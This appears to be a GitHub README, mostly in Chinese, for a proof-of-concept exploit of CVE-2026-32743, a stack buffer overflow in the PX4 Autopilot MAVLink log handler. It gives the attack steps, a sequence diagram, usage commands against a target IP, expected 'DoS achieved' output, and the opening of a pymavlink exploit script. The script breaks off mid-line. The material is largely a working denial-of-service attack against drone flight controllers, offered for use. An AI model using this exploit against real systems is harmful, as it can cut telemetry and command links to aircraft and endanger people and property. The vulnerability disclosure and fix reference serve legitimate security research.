mbanyamer/CVE-2026-32743-PX4-Autopilot-MavlinkLogHandler-Stack-Buffer-Overflow-DoS-

# CVE-2026-32743 - PX4 Autopilot MavlinkLogHandler 栈缓冲区溢出 (DoS) [](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-32743) [-orange)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) [-blue)](https://cwe.mitre.org/data/definitions/121.html) [](https://px4.io/) [](#) [](LICENSE) [](https://python.org) [](https://github.com/mbanyamer) [](https://instagram.com/banyamer_security) [Twitter](https://img.shields.io/badge/Twitter-@banyamer_sec-1DA1F2?logo=twitter)](https://twitter.com/banyamer_sec) ## 📜 描述 **CVE-2026-32743** 是 PX4 Autopilot **≤1.17.0-rc2** 版本中 `MavlinkLogHandler` 的一处**栈缓冲区溢出**漏洞。 `LogEntry.filepath` 缓冲区仅有 **60 字节**，但 `sscanf()` 在解析日志目录路径时**没有指定宽度限定符**。 拥有 **MAVLink 链路访问权限**的攻击者可以： 1. 使用 **MAVLink FTP** 在 `/fs/microsd/log/` 内创建一个深层嵌套目录（路径长度 > 60 字节）。 2. 通过 `MAV_CMD_REQUEST_LOG_LIST` 请求日志列表。 3. 存在漏洞的 `MavlinkLogHandler` 会将长路径复制到 60 字节的缓冲区中 → **栈溢出**。 4. MAVLink 任务崩溃 → **遥测和指令能力丧失** → **持续的拒绝服务** —— 直到系统重启。 **已修复于**：[commit 616b25a](https://github.com/PX4/PX4-Autopilot/commit/616b25a280e229c24d5cf12a03dbf248df89c474) —— 为 `sscanf` 添加了宽度限定符。 ## 🔥 攻击流程图 ``` sequenceDiagram participant Attacker participant PX4 as PX4 Flight Controller participant SD as SD Card (/fs/microsd/log/) Attacker->>PX4: 1. Open MAVLink connection (UDP 14550) PX4-->>Attacker: Heartbeat (system/component IDs) Note over Attacker,PX4: Step 2: Create long directory via MAVLink FTP Attacker->>PX4: MAVLink FTP: OpenFile( path = "/fs/microsd/log/" + "A"*70, flags=O_CREAT|O_DIRECTORY ) PX4->>SD: Create directory (named 70×'A') SD-->>PX4: OK Note over Attacker,PX4: Step 3: Trigger overflow by requesting log list Attacker->>PX4: MAV_CMD_REQUEST_LOG_LIST (command 261) PX4->>PX4: MavlinkLogHandler::list() reads log directory PX4->>PX4: sscanf(path, "%s", LogEntry.filepath) ← NO width limit! Note right of PX4: Buffer overflow: 70 bytes written into 60-byte buffer PX4--xAttacker: MAVLink task crashes → no more heartbeats/commands Note over Attacker,PX4: ✅ DoS achieved – flight controller unmanageable ``` ## ⚙️ 前置条件 - 运行 **PX4** **≤ `1.17.0-rc2`** 且挂载了 **SD 卡**（日志存储在 `/fs/microsd/log/`）的目标设备。 - 已启用 **MAVLink FTP** —— 在大多数 PX4 构建版本中默认开启。 - 拥有飞控 MAVLink UDP 端口（默认 `14550`）的**网络访问权限**。 - 安装了 `pymavlink` 的 **Python 3.6+**： pip install pymavlink ## 🚀 用法 ``` git clone https://github.com/mbanyamer/CVE-2026-32743-PoC cd CVE-2026-32743-PoC python3 exploit.py [--port ] ``` | 参数 | 描述 | 默认值 | |--------------|--------------------------------------|-----------| | `target_ip` | 飞控的 IP 地址 | *必填*| | `--port` | MAVLink UDP 端口 | `14550` | ### 示例 ``` python3 exploit.py 192.168.1.10 --port 14550 ``` **预期输出** —— DoS 成功： ``` [*] Connecting to MAVLink target: 192.168.1.10:14550 [+] Heartbeat received from system 1, component 1 [*] Creating long directory: /fs/microsd/log/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (length 80 bytes) [+] Directory created (or already existed). [*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST... [*] Waiting for crash (target will stop responding)... [+] Target unresponsive – DoS achieved! ``` ## 📄 PoC 代码 ``` #!/usr/bin/env python3 # 漏洞标题: PX4 Autopilot MavlinkLogHandler Stack Buffer Overflow (DoS) # CVE: CVE-2026-32743 # 日期: 2026-05-08 # 漏洞作者: Mohammed Idrees Banyamer # 作者国家: Jordan # Instagram: @banyamer_security # 作者 GitHub: https://github.com/mbanyamer # 厂商主页: https://px4.io/ # 软件链接: https://github.com/PX4/PX4-Autopilot # 受影响版本: Versions 1.17.0-rc2 and below # 测试环境: PX4 v1.17.0-rc2 (Pixhawk) # 分类: DoS # 平台: Embedded (PX4 Autopilot) # 漏洞类型: Stack-based Buffer Overflow # CVSS: 7.5 (High) # CWE: CWE-121 # 描述: Creates an overly long directory via MAVLink FTP, then requests log list. # 修复于: https://github.com/PX4/PX4-Autopilot/commit/616b25a # 用法: python3 exploit.py [--port ] print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║ ║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║ ║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║ ║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║ ║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║ ║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║ ║ ║ ║ [ b a n y a m e r _ s e c u r i t y ] ║ ║ ║ ║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ Exploit : CVE-2026-32743 ║ ║ Target : PX4 Autopilot • MAVLink • Log Handler ║ ║ ║ ║ Status : ACTIVE ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import time import struct import argparse from pymavlink import mavutil from pymavlink.dialects.v20 import common as mavlink2 def send_ftp_command(mav, seq, payload): msg = mav.file_transfer_protocol_encode( target_system=mav.target_system, target_component=mav.target_component, payload=payload ) mav.mav.send(msg) def ftp_create_directory(mav, path): O_CREAT = 0x04 O_DIRECTORY = 0x08 seq = 1 path_bytes = path.encode('utf-8') + b'\x00' payload = struct.pack('

标签：C++, CVE-2026-32743, CWE-121, DoS, MAVLink, PoC, PX4, Python, 协议漏洞, 安全漏洞, 崩溃, 数据擦除, 无人机, 无人机安全, 无后门, 暴力破解, 栈溢出, 缓冲区溢出, 网络安全, 航空电子设备, 路径遍历, 远程拒绝服务, 逆向工具, 隐私保护, 飞控系统